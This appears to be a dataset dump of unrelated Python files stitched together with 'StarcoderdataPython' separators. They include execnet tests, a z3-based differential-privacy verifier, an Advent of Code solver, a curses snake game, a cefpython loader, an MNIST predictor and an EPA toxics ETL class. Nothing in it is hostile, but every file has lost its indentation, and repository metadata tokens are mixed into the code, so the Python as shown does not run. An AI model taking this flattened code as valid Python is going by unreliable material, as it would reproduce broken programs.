mat_jacobi = _efitlib.mat_jacobi
def quat_to_mat(VECTOR):
return _efitlib.quat_to_mat(VECTOR)
quat_to_mat = _efitlib.quat_to_mat
def mat_to_quat(ARRAY2D, VECTOR):
return _efitlib.mat_to_quat(ARRAY2D, VECTOR)
mat_to_quat = _efitlib.mat_to_quat
# This file is compatible with both classic and new-style classes.
|
StarcoderdataPython
|
11336028
|
"""Module for converting between NetworkX and RDFLib graphs"""
from .rdf import RDFConverter
from .nx import NXConverter
|
StarcoderdataPython
|
4888994
|
from __future__ import with_statement
import py
import pytest
import sys
import os
import subprocess
import inspect
import execnet
from execnet import gateway_base, gateway, gateway_io
from execnet.gateway_base import Message, ChannelFactory, Popen2IO
try:
from StringIO import StringIO as BytesIO
except ImportError:
from io import BytesIO
skip_win_pypy = pytest.mark.xfail(condition=hasattr(sys, 'pypy_version_info') and sys.platform.startswith('win'),
reason='failing on Windows on PyPy (#63)')
class TestSerializeAPI:
pytestmark = [
pytest.mark.parametrize("val", [
"123", 42, [1, 2, 3], ["23", 25]])]
def test_serializer_api(self, val):
dumped = execnet.dumps(val)
val2 = execnet.loads(dumped)
assert val == val2
def test_mmap(self, tmpdir, val):
mmap = pytest.importorskip("mmap").mmap
p = tmpdir.join("data")
with p.open("wb") as f:
f.write(execnet.dumps(val))
f = p.open("r+b")
m = mmap(f.fileno(), 0)
val2 = execnet.load(m)
assert val == val2
def test_bytesio(self, val):
f = py.io.BytesIO()
execnet.dump(f, val)
read = py.io.BytesIO(f.getvalue())
val2 = execnet.load(read)
assert val == val2
def test_serializer_api_version_error(monkeypatch):
bchr = gateway_base.bchr
monkeypatch.setattr(gateway_base, 'DUMPFORMAT_VERSION', bchr(1))
dumped = execnet.dumps(42)
monkeypatch.setattr(gateway_base, 'DUMPFORMAT_VERSION', bchr(2))
pytest.raises(execnet.DataFormatError, lambda: execnet.loads(dumped))
def test_errors_on_execnet():
assert hasattr(execnet, 'RemoteError')
assert hasattr(execnet, 'TimeoutError')
assert hasattr(execnet, 'DataFormatError')
def test_subprocess_interaction(anypython):
line = gateway_io.popen_bootstrapline
compile(line, 'xyz', 'exec')
args = [str(anypython), '-c', line]
popen = subprocess.Popen(
args, bufsize=0, universal_newlines=True,
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
def send(line):
popen.stdin.write(line)
if sys.version_info > (3, 0) or sys.platform.startswith("java"):
popen.stdin.flush()
def receive():
return popen.stdout.readline()
try:
source = py.code.Source(read_write_loop, "read_write_loop()")
repr_source = repr(str(source)) + "\n"
sendline = repr_source
send(sendline)
s = receive()
assert s == "ok\n"
send("hello\n")
s = receive()
assert s == "received: hello\n"
send("world\n")
s = receive()
assert s == "received: world\n"
send('\n') # terminate loop
finally:
popen.stdin.close()
popen.stdout.close()
popen.wait()
def read_write_loop():
sys.stdout.write("ok\n")
sys.stdout.flush()
while 1:
try:
line = sys.stdin.readline()
if not line.strip():
break
sys.stdout.write("received: %s" % line)
sys.stdout.flush()
except (IOError, EOFError):
break
def test_io_message(anypython, tmpdir, execmodel):
check = tmpdir.join("check.py")
check.write(py.code.Source(gateway_base, """
try:
from io import BytesIO
except ImportError:
from StringIO import StringIO as BytesIO
import tempfile
temp_out = BytesIO()
temp_in = BytesIO()
io = Popen2IO(temp_out, temp_in, get_execmodel({backend!r}))
for i, handler in enumerate(Message._types):
print ("checking %s %s" %(i, handler))
for data in "hello", "hello".encode('ascii'):
msg1 = Message(i, i, dumps(data))
msg1.to_io(io)
x = io.outfile.getvalue()
io.outfile.truncate(0)
io.outfile.seek(0)
io.infile.seek(0)
io.infile.write(x)
io.infile.seek(0)
msg2 = Message.from_io(io)
assert msg1.channelid == msg2.channelid, (msg1, msg2)
assert msg1.data == msg2.data, (msg1.data, msg2.data)
assert msg1.msgcode == msg2.msgcode
print ("all passed")
""".format(backend=execmodel.backend)))
# out = py.process.cmdexec("%s %s" %(executable,check))
out = anypython.sysexec(check)
print (out)
assert "all passed" in out
def test_popen_io(anypython, tmpdir, execmodel):
check = tmpdir.join("check.py")
check.write(py.code.Source(gateway_base, """
do_exec("io = init_popen_io(get_execmodel({backend!r}))", globals())
io.write("hello".encode('ascii'))
s = io.read(1)
assert s == "x".encode('ascii')
""".format(backend=execmodel.backend)))
from subprocess import Popen, PIPE
args = [str(anypython), str(check)]
proc = Popen(args, stdin=PIPE, stdout=PIPE, stderr=PIPE)
proc.stdin.write("x".encode('ascii'))
stdout, stderr = proc.communicate()
print (stderr)
proc.wait()
assert "hello".encode('ascii') in stdout
def test_popen_io_readloop(monkeypatch, execmodel):
sio = BytesIO('test'.encode('ascii'))
io = Popen2IO(sio, sio, execmodel)
real_read = io._read
def newread(numbytes):
if numbytes > 1:
numbytes = numbytes-1
return real_read(numbytes)
io._read = newread
result = io.read(3)
assert result == 'tes'.encode('ascii')
def test_rinfo_source(anypython, tmpdir):
check = tmpdir.join("check.py")
check.write(py.code.Source("""
class Channel:
def send(self, data):
assert eval(repr(data), {}) == data
channel = Channel()
""", gateway.rinfo_source, """
print ('all passed')
"""))
out = anypython.sysexec(check)
print (out)
assert "all passed" in out
def test_geterrortext(anypython, tmpdir):
check = tmpdir.join("check.py")
check.write(py.code.Source(gateway_base, """
class Arg:
pass
errortext = geterrortext((Arg, "1", 4))
assert "Arg" in errortext
import sys
try:
raise ValueError("17")
except ValueError:
excinfo = sys.exc_info()
s = geterrortext(excinfo)
assert "17" in s
print ("all passed")
"""))
out = anypython.sysexec(check)
print (out)
assert "all passed" in out
@pytest.mark.skipif("not hasattr(os, 'dup')")
def test_stdouterrin_setnull(execmodel):
cap = py.io.StdCaptureFD()
gateway_base.init_popen_io(execmodel)
os.write(1, "hello".encode('ascii'))
if os.name == "nt":
os.write(2, "world")
os.read(0, 1)
out, err = cap.reset()
assert not out
assert not err
class PseudoChannel:
class gateway:
class _channelfactory:
finished = False
def __init__(self):
self._sent = []
self._closed = []
self.id = 1000
def send(self, obj):
self._sent.append(obj)
def close(self, errortext=None):
self._closed.append(errortext)
def test_exectask(execmodel):
io = py.io.BytesIO()
io.execmodel = execmodel
gw = gateway_base.SlaveGateway(io, id="something")
ch = PseudoChannel()
gw.executetask((ch, ("raise ValueError()", None, {})))
assert "ValueError" in str(ch._closed[0])
class TestMessage:
def test_wire_protocol(self):
for i, handler in enumerate(Message._types):
one = py.io.BytesIO()
data = '23'.encode('ascii')
Message(i, 42, data).to_io(one)
two = py.io.BytesIO(one.getvalue())
msg = Message.from_io(two)
assert msg.msgcode == i
assert isinstance(msg, Message)
assert msg.channelid == 42
assert msg.data == data
assert isinstance(repr(msg), str)
class TestPureChannel:
@pytest.fixture
def fac(self, execmodel):
class Gateway:
pass
Gateway.execmodel = execmodel
return ChannelFactory(Gateway)
def test_factory_create(self, fac):
chan1 = fac.new()
assert chan1.id == 1
chan2 = fac.new()
assert chan2.id == 3
def test_factory_getitem(self, fac):
chan1 = fac.new()
assert fac._channels[chan1.id] == chan1
chan2 = fac.new()
assert fac._channels[chan2.id] == chan2
def test_channel_timeouterror(self, fac):
channel = fac.new()
pytest.raises(IOError, channel.waitclose, timeout=0.01)
def test_channel_makefile_incompatmode(self, fac):
channel = fac.new()
with pytest.raises(ValueError):
channel.makefile("rw")
class TestSourceOfFunction(object):
def test_lambda_unsupported(self):
pytest.raises(ValueError, gateway._source_of_function, lambda: 1)
def test_wrong_prototype_fails(self):
def prototype(wrong):
pass
pytest.raises(ValueError, gateway._source_of_function, prototype)
def test_function_without_known_source_fails(self):
# this one wont be able to find the source
mess = {}
py.builtin.exec_('def fail(channel): pass', mess, mess)
print(inspect.getsourcefile(mess['fail']))
pytest.raises(ValueError, gateway._source_of_function, mess['fail'])
def test_function_with_closure_fails(self):
mess = {}
def closure(channel):
print(mess)
pytest.raises(ValueError, gateway._source_of_function, closure)
def test_source_of_nested_function(self):
def working(channel):
pass
send_source = gateway._source_of_function(working)
expected = 'def working(channel):\n pass\n'
assert send_source == expected
class TestGlobalFinder(object):
def check(self, func):
src = py.code.Source(func)
code = py.code.Code(func)
return gateway._find_non_builtin_globals(str(src), code.raw)
def test_local(self):
def f(a, b, c):
d = 3
return d
assert self.check(f) == []
def test_global(self):
def f(a, b):
sys
d = 4
return d
assert self.check(f) == ['sys']
def test_builtin(self):
def f():
len
assert self.check(f) == []
def test_function_with_global_fails(self):
def func(channel):
sys
pytest.raises(ValueError, gateway._source_of_function, func)
def test_method_call(self):
        # method names are the reason the simple
        # code-object-based heuristic fails
def f(channel):
channel.send(dict(testing=2))
assert self.check(f) == []
@skip_win_pypy
def test_remote_exec_function_with_kwargs(anypython, makegateway):
def func(channel, data):
channel.send(data)
gw = makegateway('popen//python=%s' % anypython)
print ("local version_info {!r}".format(sys.version_info))
print ("remote info: {}".format(gw._rinfo()))
ch = gw.remote_exec(func, data=1)
result = ch.receive()
assert result == 1
def test_remote_exc__no_kwargs(makegateway):
gw = makegateway()
with pytest.raises(TypeError):
gw.remote_exec(gateway_base, kwarg=1)
with pytest.raises(TypeError):
gw.remote_exec('pass', kwarg=1)
@skip_win_pypy
def test_remote_exec_inspect_stack(makegateway):
gw = makegateway()
ch = gw.remote_exec("""
import inspect
inspect.stack()
import traceback
channel.send('\\n'.join(traceback.format_stack()))
""")
assert 'File "<remote exec>"' in ch.receive()
ch.waitclose()
|
StarcoderdataPython
|
6469196
|
<gh_stars>1-10
import ast
import _ast
import re
from lightdp.typing import *
import z3
_cmpop_map = {
ast.Eq: lambda x, y: x == y,
ast.Not: lambda x: z3.Not(x),
ast.Gt: lambda x, y: x > y,
ast.Lt: lambda x, y: x < y,
ast.LtE: lambda x, y: x <= y,
ast.GtE: lambda x, y: x >= y
}
_binop_map = {
ast.Add: lambda x, y: x + y,
ast.Sub: lambda x, y: x - y,
ast.Mult: lambda x, y: x * y,
ast.Div: lambda x, y: x / y
}
_boolop_map = {
ast.And: lambda x, y: z3.And(x, y),
ast.Or: lambda x, y: z3.Or(x, y)
}
_unop_map = {
ast.USub: lambda x: -x
}
class NodeVerifier(ast.NodeVisitor):
"""
Walks through the :py:class:`ast.AST` and generate constraints to be solved by z3.
"""
def __init__(self):
"""
Initialization of :py:class:`NodeVerifier`.
"""
self._precondition = []
self._declarations = []
self._if_checks = []
self._assign_checks = []
self._type_map = None
def get_constraint(self):
return z3.And(z3.And(self._precondition), z3.And(self._declarations),
z3.Not(z3.And(z3.And(self._if_checks), z3.And(self._assign_checks))))
def _symbol(self, name):
lightdp_type = self._type_map[name]
if isinstance(lightdp_type, NumType):
return z3.Real(name)
elif isinstance(lightdp_type, ListType):
if isinstance(lightdp_type.elem_type, NumType):
return z3.Array(name, z3.RealSort(), z3.RealSort())
elif isinstance(lightdp_type.elem_type, BoolType):
return z3.Array(name, z3.BoolSort(), z3.RealSort())
else:
raise ValueError('Unsupported list inside list.')
elif isinstance(lightdp_type, FunctionType):
raise NotImplementedError('Function type is currently not supported.')
elif isinstance(lightdp_type, BoolType):
return z3.Bool(name)
else:
assert False, 'No such type %s' % lightdp_type
@staticmethod
def parse_docstring(s):
assert s is not None
from .lexer import build_lexer
from .parser import build_parser
lexer = build_lexer()
parser = build_parser()
return parser.parse(s, lexer=lexer)
@staticmethod
def parse_expr(expr):
node = ast.parse(expr)
assert isinstance(node, ast.Module) and isinstance(node.body[0], ast.Expr), \
r"""expr_parse fed with illegal expression string '%s'""" % expr
return node.body[0].value
def visit_FunctionDef(self, node):
annotation = NodeVerifier.parse_docstring(ast.get_docstring(node))
if annotation is not None:
forall_vars, precondition, self._type_map = annotation
# set the distance vars for the corresponding normal vars
from collections import OrderedDict
for name, var_type in OrderedDict(self._type_map).items():
constraint = None
if isinstance(var_type, NumType):
self._type_map['^' + name] = NumType(0)
if var_type.value != '*':
# TODO: distance variables should be simpler
distance_vars = re.findall(r"""\^([_a-zA-Z][0-9a-zA-Z_]*)""", var_type.value)
constraint = self._symbol('^' + name) == \
self.visit(self.parse_expr(var_type.value.replace('^', '')))[0]
for distance_var in distance_vars:
constraint = z3.substitute(constraint,
(self._symbol(distance_var), self._symbol('^' + distance_var)))
elif isinstance(var_type, BoolType):
self._type_map['^' + name] = NumType(0)
constraint = self._symbol('^' + name) == \
self.visit(self.parse_expr('0'))[0]
elif isinstance(var_type, FunctionType):
# TODO: consider FunctionType
pass
elif isinstance(var_type, ListType):
# TODO: consider list inside list
self._type_map['^' + name] = ListType(NumType(0))
symbol_i = self._symbol('i')
if isinstance(var_type.elem_type, NumType) and var_type.elem_type.value != '*':
constraint = self._symbol('^' + name)[symbol_i] == \
self.visit(self.parse_expr(var_type.elem_type.value))[0]
elif isinstance(var_type.elem_type, BoolType):
constraint = self._symbol('^' + name)[symbol_i] == \
self.visit(self.parse_expr('0'))[0]
if constraint is not None:
self._declarations.append(constraint)
# parse the precondition to constraint
distance_vars = re.findall(r"""\^([_a-zA-Z][0-9a-zA-Z_]*)""", precondition)
pre_constraint = self.visit(self.parse_expr(precondition.replace('^', '')))[0]
for distance_var in distance_vars:
pre_constraint = z3.substitute(pre_constraint,
(self._symbol(distance_var), self._symbol('^' + distance_var)))
if forall_vars is not None:
pre_constraint = z3.ForAll([self._symbol(var) for var in forall_vars], pre_constraint)
del self._precondition[:]
self._precondition.append(pre_constraint)
# empty the check list
del self._if_checks[:]
del self._assign_checks[:]
self.generic_visit(node)
def visit_If(self, node):
test_node = self.visit(node.test)
self._if_checks.append(test_node[0] == test_node[1])
self.generic_visit(node)
def visit_IfExp(self, node):
test_node = self.visit(node.test)
self._if_checks.append(test_node[0] == test_node[1])
return z3.If(test_node[0], self.visit(node.body)[0], self.visit(node.orelse)[0]), \
z3.If(test_node[1], self.visit(node.body)[1], self.visit(node.orelse)[1])
def visit_Compare(self, node):
        assert len(node.ops) == 1 and len(node.comparators) == 1, 'Only one comparator is allowed in binary operations.'
left_expr = self.visit(node.left)
right_expr = self.visit(node.comparators[0])
return (_cmpop_map[node.ops[0].__class__](left_expr[0], right_expr[0]),
_cmpop_map[node.ops[0].__class__](left_expr[0] + left_expr[1], right_expr[0] + right_expr[1]))
def visit_Name(self, node):
assert node.id in self._type_map, 'Undefined %s' % node.id
return self._symbol(node.id), self._symbol('^' + node.id)
def visit_Num(self, node):
return node.n, 0
def visit_BinOp(self, node):
assert isinstance(node.op, tuple(_binop_map.keys())), 'Unsupported BinOp %s' % ast.dump(node.op)
return (_binop_map[node.op.__class__](self.visit(node.left)[0], self.visit(node.right)[0]),
_binop_map[node.op.__class__](self.visit(node.left)[1], self.visit(node.right)[1]))
def visit_Subscript(self, node):
assert isinstance(node.slice, ast.Index), 'Only index is supported.'
return (self.visit(node.value)[0][self.visit(node.slice.value)[0]],
self.visit(node.value)[1][self.visit(node.slice.value)[0]])
def visit_BoolOp(self, node):
assert isinstance(node.op, tuple(_boolop_map.keys())), 'Unsupported BoolOp %s' % ast.dump(node.op)
from functools import reduce
return (reduce(_boolop_map[node.op.__class__], [self.visit(value)[0] for value in node.values]),
reduce(_boolop_map[node.op.__class__], [self.visit(value)[1] for value in node.values]))
def visit_UnaryOp(self, node):
assert isinstance(node.op, tuple(_unop_map.keys())), 'Unsupported UnaryOp %s' % ast.dump(node.op)
return (_unop_map[node.op.__class__](self.visit(node.operand)[0]),
_unop_map[node.op.__class__](self.visit(node.operand)[1]))
def visit_Assign(self, node):
if isinstance(node.value, ast.Call) and node.value.func.id == 'Laplace':
pass
elif len(node.targets) == 1 and isinstance(node.targets[0], ast.Name):
target_type = self._type_map[node.targets[0].id]
if isinstance(target_type, ListType):
# TODO: list assignment
pass
# raise NotImplementedError('List assignment not implemented.')
else:
self._assign_checks.append(self.visit(node.targets[0])[1] == self.visit(node.value)[1])
else:
            raise NotImplementedError('Multiple assignment is currently not supported.')
def visit_NameConstant(self, node):
assert node.value is True or node.value is False, 'Unsupported NameConstant %s' % str(node.value)
return node.value, NumType(0)
def visit_Call(self, node):
if isinstance(node.func, ast.Attribute) and node.func.attr == 'append':
# type check
assert isinstance(self._type_map[node.func.value.id], ListType), \
'%s is not typed as list.' % node.func.value.id
if isinstance(self._type_map[node.func.value.id].elem_type, NumType):
                self._declarations.append(self.visit(node.func.value)[1][self._symbol('i')] ==
                                          self.visit(node.args[0])[1])
else:
# TODO: check the function return type.
pass
def verify(tree):
"""
Verify the :py:class:`ast.AST` and returns the satisfiability.
:param tree: The original :py:class:`ast.AST` node.
:return: True if the constraints are satisfied otherwise False.
"""
assert isinstance(tree, _ast.AST)
for node in ast.walk(tree):
if isinstance(node, ast.FunctionDef):
# TODO: consider multiple functions scenario
verifier = NodeVerifier()
verifier.visit(node)
s = z3.Solver()
s.add(verifier.get_constraint())
return (True if s.check() == z3.sat else False), str(verifier.get_constraint())
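if __name__ == '__main__':
    # Hypothetical command-line driver, not part of the module: parse a LightDP-annotated
    # source file and report whether its proof obligations hold.
    import sys
    with open(sys.argv[1]) as f:
        tree = ast.parse(f.read())
    ok, constraint = verify(tree)
    print('verified' if ok else 'failed')
    print(constraint)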
|
StarcoderdataPython
|
4922124
|
<gh_stars>0
from python_framework import Controller, ControllerMethod, HttpStatus
@Controller(url='/actuator/health', tag='HealthCheck', description='HealthCheck controller')
class ActuatorHealthController:
@ControllerMethod()
def get(self):
return {'status' : 'UP'}, HttpStatus.OK
@Controller(url='/', tag='HealthCheck', description='HealthCheck controller')
class ActuatorHealthBatchController:
@ControllerMethod()
def get(self):
return {'status' : 'UP'}, HttpStatus.OK
|
StarcoderdataPython
|
11395298
|
<filename>aoc2021/day_05.py
"""
This problem can be solved in many ways. The optimal one AFAIK is using
Bentley–Ottmann algorithm (O((n + k)log(n))). Unfortunately, I'm unable
to implement it (yet).
"""
from __future__ import annotations
from typing import NamedTuple, Generator
from collections import Counter
class Point(NamedTuple):
x: int
y: int
@classmethod
def parse(cls, point_text: str) -> Point:
return cls(*map(int, point_text.split(",")))
class Line(NamedTuple):
start: Point
end: Point
@property
def is_horizontal(self) -> bool:
return self.start.y == self.end.y
@property
def is_vertical(self) -> bool:
return self.start.x == self.end.x
@property
def is_diagonal(self) -> bool:
return not (self.is_horizontal or self.is_vertical)
def __iter__(self) -> Generator[Point, None, None]:
if self.is_diagonal:
d_x, d_y = ((1, 1), (1, -1))[self.start.y > self.end.y]
else:
d_x, d_y = ((0, 1), (1, 0))[self.is_horizontal]
current_point = self.start
while current_point != self.end:
yield current_point
current_point = Point(current_point.x + d_x, current_point.y + d_y)
yield current_point
@classmethod
def parse(cls, line_text: str) -> Line:
start, end = line_text.split(" -> ")
start_point = Point.parse(start)
end_point = Point.parse(end)
if start_point > end_point:
start_point, end_point = end_point, start_point
return cls(start_point, end_point)
def parse_lines(lines_text: str) -> list[Line]:
return [Line.parse(l) for l in lines_text.split("\n")]
def count_intersections(lines: Generator[Line, None, None]) -> int:
counter: dict[Point, int] = Counter()
for line in lines:
for point in line:
counter[point] += 1
return sum(v > 1 for v in counter.values())
def first_task(lines_text: str) -> int:
lines = parse_lines(lines_text)
return count_intersections(line for line in lines if not line.is_diagonal)
def second_task(lines_text: str) -> int:
lines = parse_lines(lines_text)
return count_intersections(line for line in lines)
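if __name__ == "__main__":
    # Quick sanity check, not part of the original solution: two axis-aligned lines
    # crossing at (0, 2) should give exactly one overlapping point.
    sample = "0,0 -> 0,3\n0,2 -> 2,2"
    assert first_task(sample) == 1
    assert second_task(sample) == 1
    print(first_task(sample), second_task(sample))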
|
StarcoderdataPython
|
8031281
|
<reponame>duanguanhua/python_practice
print("hello world")
age = 18
print("The value in the age variable is %d" % age)
name = "东哥"
print("The name is: %s" % name)
|
StarcoderdataPython
|
8125236
|
# Copyright (c) 2020. <NAME>
import enum
class Move(enum.Enum):
"""
Enumerations of Moves allowed for the Bloxorz Block in the game
Allowed moves are Left, Right, Up, Down
"""
Left = 1
Right = 2
Up = 3
Down = 4
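# Minimal usage sketch (not part of the original module): members compare by identity,
# can be looked up by name, and iterate in declaration order.
if __name__ == "__main__":
    move = Move.Left
    print(move, move.value)           # Move.Left 1
    print(Move["Up"] is Move.Up)      # True
    print([m.name for m in Move])     # ['Left', 'Right', 'Up', 'Down']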
|
StarcoderdataPython
|
4975445
|
import random
import curses

s = curses.initscr()
curses.curs_set(0)
sh, sw = s.getmaxyx()
w = curses.newwin(sh, sw, 0, 0)
w.keypad(1)
w.timeout(100)

# Start the snake in the left quarter of the screen, three segments long
snk_x = sw // 4
snk_y = sh // 2
snake = [
    [snk_y, snk_x],
    [snk_y, snk_x - 1],
    [snk_y, snk_x - 2]
]

food = [sh // 2, sw // 2]
w.addch(food[0], food[1], curses.ACS_PI)

key = curses.KEY_RIGHT

while True:
    next_key = w.getch()
    key = key if next_key == -1 else next_key

    # Game over if the snake hits the border or runs into itself
    if snake[0][0] in [0, sh] or snake[0][1] in [0, sw] or snake[0] in snake[1:]:
        curses.endwin()
        quit()

    new_head = [snake[0][0], snake[0][1]]
    if key == curses.KEY_DOWN:
        new_head[0] += 1
    if key == curses.KEY_UP:
        new_head[0] -= 1
    if key == curses.KEY_LEFT:
        new_head[1] -= 1
    if key == curses.KEY_RIGHT:
        new_head[1] += 1

    snake.insert(0, new_head)

    if snake[0] == food:
        # Place a new piece of food somewhere off the snake's body
        food = None
        while food is None:
            nf = [
                random.randint(1, sh - 1),
                random.randint(1, sw - 1)
            ]
            food = nf if nf not in snake else None
        w.addch(food[0], food[1], curses.ACS_PI)
    else:
        tail = snake.pop()
        w.addch(tail[0], tail[1], ' ')

    w.addch(snake[0][0], snake[0][1], curses.ACS_CKBOARD)
StarcoderdataPython
|
198369
|
# Copyright (c) 2013 CEF Python, see the Authors file.
# All rights reserved. Licensed under BSD 3-clause license.
# Project website: https://github.com/cztomczak/cefpython
# NOTE: Template variables like {{VERSION}} are replaced with actual
# values when make_installer.py tool generates this package
# installer.
import os
import sys
import ctypes
import platform
__all__ = ["cefpython"] # Disabled: "wx"
__version__ = "{{VERSION}}"
__author__ = "The CEF Python authors"
# If package was installed using PIP or setup.py then package
# dir is here:
# /usr/local/lib/python2.7/dist-packages/cefpython3/
# If this is a debian package then package_dir returns:
# /usr/lib/pymodules/python2.7/cefpython3
# The above path consists of symbolic links to the real directory:
# /usr/share/pyshared/cefpython3
package_dir = os.path.dirname(os.path.abspath(__file__))
# This loads the libcef.so library for the subprocess executable.
# On Mac it works without setting library paths.
os.environ["LD_LIBRARY_PATH"] = package_dir
# This env variable will be returned by cefpython.GetModuleDirectory().
os.environ["CEFPYTHON3_PATH"] = package_dir
# This loads the libcef library for the main python executable.
# Loading library dynamically using ctypes.CDLL is required on Linux.
# TODO: Check if on Linux libcef.so can be linked like on Mac.
# On Mac the CEF framework dependency information is added to
# the cefpython*.so module by linking to CEF framework.
# The libffmpegsumo.so library does not need to be loaded here,
# it may cause issues to load it here in the browser process.
if platform.system() == "Linux":
libcef = os.path.join(package_dir, "libcef.so")
ctypes.CDLL(libcef, ctypes.RTLD_GLOBAL)
# Load the cefpython module for given Python version
if sys.version_info[:2] == (2, 7):
# noinspection PyUnresolvedReferences
from . import cefpython_py27 as cefpython
elif sys.version_info[:2] == (3, 4):
# noinspection PyUnresolvedReferences
from . import cefpython_py34 as cefpython
elif sys.version_info[:2] == (3, 5):
# noinspection PyUnresolvedReferences
from . import cefpython_py35 as cefpython
elif sys.version_info[:2] == (3, 6):
# noinspection PyUnresolvedReferences
from . import cefpython_py36 as cefpython
elif sys.version_info[:2] == (3, 7):
# noinspection PyUnresolvedReferences
from . import cefpython_py37 as cefpython
else:
raise Exception("Python version not supported: " + sys.version)
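# Typical usage sketch (not executed here; based on the upstream cefpython examples,
# so treat the exact calls as illustrative):
#
#   from cefpython3 import cefpython as cef
#   cef.Initialize()
#   cef.CreateBrowserSync(url="https://www.example.com", window_title="Hello CEF")
#   cef.MessageLoop()
#   cef.Shutdown()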
|
StarcoderdataPython
|
5082021
|
def factorial(n):
'''returns n!'''
return 1 if n < 2 else n * factorial(n-1)
print(factorial(12))
print(factorial.__doc__)
print(type(factorial))
fact = factorial
print(fact(12))
# Higher-order functions: functions that take or return other functions
l = ['jfis','apple','cherry','raspberry','banana']
print(sorted(l, key=len))
def reverse(word):
return word[::-1]
print(sorted(l, key= reverse))
# map reduce
print(list(map(fact, range(6))))
# A list comprehension is more intuitive
print([fact(n) for n in range(6)])
print(list(map(fact, filter(lambda n: n%2, range(6)))))
# Again, a list comprehension is more intuitive
print([fact(n) for n in range(6) if n%2])
from functools import reduce
from operator import add
print(reduce(add, range(100)))
print(sum(range(100)))
# Function introspection
print(dir(factorial))
class C: pass
obj = C()
def func(): pass
print(sorted(set(dir(func)) - set(dir(obj))))
print(func.__code__)
|
StarcoderdataPython
|
8098916
|
import tensorflow as tf
import cv2
import mnist
import numpy as np
def pred(filename, train_dir):
img = cv2.imread(filename, flags=cv2.IMREAD_GRAYSCALE)
img = tf.cast(img, tf.float32)
img = tf.reshape(img, [-1, 28, 28, 1])
logits, predict = mnist.inference(img, training=False)
saver = tf.train.Saver()
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(train_dir)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
else:
print('no checkpoint file')
return
pre = sess.run(predict)
print('model:{}, file:{}, label: {} ({:.2f}%)'.
format(ckpt.model_checkpoint_path, filename, np.argmax(pre[0]), np.max(pre[0]) * 100))
if __name__ == '__main__':
pred('./img_test/2_2098.jpg', './train')
|
StarcoderdataPython
|
1884446
|
from pathlib import Path
import pandas as pd
from data_pipeline.etl.base import ExtractTransformLoad
from data_pipeline.score import field_names
from data_pipeline.utils import get_module_logger, unzip_file_from_url
logger = get_module_logger(__name__)
class EPARiskScreeningEnvironmentalIndicatorsETL(ExtractTransformLoad):
"""Class for 2019 Census Tract RSEI Aggregated micro-data
Data source overview: Page 20 in this document:
https://www.epa.gov/sites/default/files/2017-01/documents/rsei-documentation-geographic-microdata-v235.pdf
    Disaggregated and aggregated datasets for 2019 are documented here:
https://github.com/usds/justice40-tool/issues/1070#issuecomment-1005604014
"""
def __init__(self):
self.AGGREGATED_RSEI_SCORE_FILE_URL = "http://abt-rsei.s3.amazonaws.com/microdata2019/census_agg/CensusMicroTracts2019_2019_aggregated.zip"
self.OUTPUT_PATH: Path = (
self.DATA_PATH / "dataset" / "epa_rsei_aggregated"
)
self.EPA_RSEI_SCORE_THRESHOLD_CUTOFF = 0.75
self.TRACT_INPUT_COLUMN_NAME = "GEOID10"
self.NUMBER_FACILITIES_INPUT_FIELD = "NUMFACS"
self.NUMBER_RELEASES_INPUT_FIELD = "NUMRELEASES"
self.NUMBER_CHEMICALS_INPUT_FIELD = "NUMCHEMS"
self.AVERAGE_TOXICITY_INPUT_FIELD = "TOXCONC"
self.SCORE_INPUT_FIELD = "SCORE"
self.POPULATION_INPUT_FIELD = "POP"
self.CSCORE_INPUT_FIELD = "CSCORE"
self.NCSCORE_INPUT_FIELD = "NSCORE"
# References to the columns that will be output
self.COLUMNS_TO_KEEP = [
self.GEOID_TRACT_FIELD_NAME,
field_names.EPA_RSEI_NUMBER_FACILITIES_FIELD,
field_names.EPA_RSEI_NUMBER_RELEASES_FIELD,
field_names.EPA_RSEI_NUMBER_CHEMICALS_FIELD,
field_names.EPA_RSEI_AVERAGE_TOXICITY_FIELD,
field_names.EPA_RSEI_SCORE_FIELD,
field_names.EPA_RSEI_CSCORE_FIELD,
field_names.EPA_RSEI_NCSCORE_FIELD,
field_names.EPA_RSEI_POPULATION_FIELD,
field_names.EPA_RSEI_SCORE_THRESHOLD_FIELD,
field_names.EPA_RSEI_SCORE_FIELD
+ field_names.PERCENTILE_FIELD_SUFFIX,
]
self.df: pd.DataFrame
def extract(self) -> None:
logger.info("Starting 2.5 MB data download.")
# the column headers from the above dataset are actually a census tract's data at this point
# We will use this data structure later to specify the column names
input_columns = [
self.TRACT_INPUT_COLUMN_NAME,
self.NUMBER_FACILITIES_INPUT_FIELD,
self.NUMBER_RELEASES_INPUT_FIELD,
self.NUMBER_CHEMICALS_INPUT_FIELD,
self.AVERAGE_TOXICITY_INPUT_FIELD,
self.SCORE_INPUT_FIELD,
self.POPULATION_INPUT_FIELD,
self.CSCORE_INPUT_FIELD,
self.NCSCORE_INPUT_FIELD,
]
unzip_file_from_url(
file_url=self.AGGREGATED_RSEI_SCORE_FILE_URL,
download_path=self.TMP_PATH,
unzipped_file_path=self.TMP_PATH / "epa_rsei_aggregated",
)
self.df = pd.read_csv(
filepath_or_buffer=self.TMP_PATH
/ "epa_rsei_aggregated"
/ "CensusMicroTracts2019_2019_aggregated.csv",
# The following need to remain as strings for all of their digits, not get
# converted to numbers.
low_memory=False,
names=input_columns,
)
def transform(self) -> None:
logger.info("Starting transforms.")
score_columns = [x for x in self.df.columns if "SCORE" in x]
# coerce dataframe type to perform correct next steps
self.df[score_columns] = self.df[score_columns].astype(float)
self.df.rename(
columns={
self.TRACT_INPUT_COLUMN_NAME: self.GEOID_TRACT_FIELD_NAME,
self.NUMBER_FACILITIES_INPUT_FIELD: field_names.EPA_RSEI_NUMBER_FACILITIES_FIELD,
self.NUMBER_RELEASES_INPUT_FIELD: field_names.EPA_RSEI_NUMBER_RELEASES_FIELD,
self.NUMBER_CHEMICALS_INPUT_FIELD: field_names.EPA_RSEI_NUMBER_CHEMICALS_FIELD,
self.AVERAGE_TOXICITY_INPUT_FIELD: field_names.EPA_RSEI_AVERAGE_TOXICITY_FIELD,
self.SCORE_INPUT_FIELD: field_names.EPA_RSEI_SCORE_FIELD,
self.CSCORE_INPUT_FIELD: field_names.EPA_RSEI_CSCORE_FIELD,
self.NCSCORE_INPUT_FIELD: field_names.EPA_RSEI_NCSCORE_FIELD,
self.POPULATION_INPUT_FIELD: field_names.EPA_RSEI_POPULATION_FIELD,
},
inplace=True,
)
